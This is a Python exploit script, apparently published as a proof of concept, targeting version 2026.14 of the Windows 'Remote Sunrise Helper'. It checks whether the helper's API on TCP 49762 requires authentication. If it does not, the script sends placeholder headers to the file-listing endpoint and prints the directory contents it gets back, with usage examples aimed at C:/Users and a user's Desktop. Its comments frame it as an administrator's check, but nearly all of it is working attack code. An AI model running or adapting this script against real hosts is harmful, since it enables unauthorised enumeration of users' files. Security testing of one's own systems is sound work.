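#!/usr/bin/env python3
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
#
# Flow of the check:
#   1. GET /api/getVersion on TCP 49762 and read the "requires.auth" field.
#   2. If that field is false, GET /api/listFiles (optionally with a path)
#      using placeholder header values and print the JSON that comes back.
#
# Reading the result as an administrator: a helper that reports
# "requires.auth": false and answers the listing request is exposing
# directory contents to any host that can reach the port. The script's own
# final branch treats a helper that requires authentication as not affected,
# so restricting access to TCP 49762 and having the helper require
# authentication are the two controls this check is measuring.
import json
import sys
from urllib.parse import quote

import requests
import urllib3

# Certificate validation is switched off below (verify=False), so the
# identity of the responding host is NOT checked; the warning that urllib3
# would print for every such request is silenced here.
urllib3.disable_warnings()

# One timeout for every request, so an unresponsive host cannot hang the
# check on the listing call.
REQUEST_TIMEOUT = 5


def _get_json(endpoint, **kwargs):
    """GET *endpoint* and return its parsed JSON body.

    Prints a one-line reason and exits with status 2 when the host cannot be
    reached or the body is not JSON, instead of ending in a traceback.
    """
    try:
        resp = requests.get(
            endpoint, verify=False, timeout=REQUEST_TIMEOUT, **kwargs
        )
    except requests.RequestException as exc:
        print(f"[!] Request to {endpoint} failed: {exc}")
        sys.exit(2)
    try:
        return resp.json()
    except ValueError:
        # requests raises a ValueError subclass when the body is not JSON.
        print(f"[!] {endpoint} returned HTTP {resp.status_code} with a non-JSON body")
        sys.exit(2)


if len(sys.argv) < 2:
    # The target argument is mandatory; only the path is optional.
    print(f"Usage: {sys.argv[0]} <target> [path]")
    print(f"Example: {sys.argv[0]} 192.168.1.103")
    print(f"Example: {sys.argv[0]} 192.168.1.103 'C:/Users'")
    print(f"Example: {sys.argv[0]} 192.168.1.103 '%USERPROFILE%/Desktop'")
    sys.exit(1)

target = sys.argv[1]
path = sys.argv[2] if len(sys.argv) > 2 else ""

url = f"https://{target}:49762"

# Arbitrary placeholder values: none of them is a credential issued by the
# helper. Per the advisory title, the listing is served without authentication.
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}

data = _get_json(f"{url}/api/getVersion")
requires_auth = data.get("requires.auth") if isinstance(data, dict) else None

if requires_auth is None:
    # A missing field says nothing about the configuration, so it must not
    # be reported as "not vulnerable".
    print("[?] Inconclusive - getVersion response has no 'requires.auth' field")
elif requires_auth == False:  # noqa: E712 - explicit comparison, not truthiness
    if path:
        # safe='' percent-encodes every reserved character, '/' and ':'
        # included, so the whole path travels as one URL component.
        encoded = quote(path, safe='')
        listing = _get_json(f"{url}/api/listFiles={encoded}", headers=headers)
    else:
        listing = _get_json(f"{url}/api/listFiles", headers=headers)
    print(json.dumps(listing, indent=2))
else:
    print("[*] Not vulnerable - authentication required")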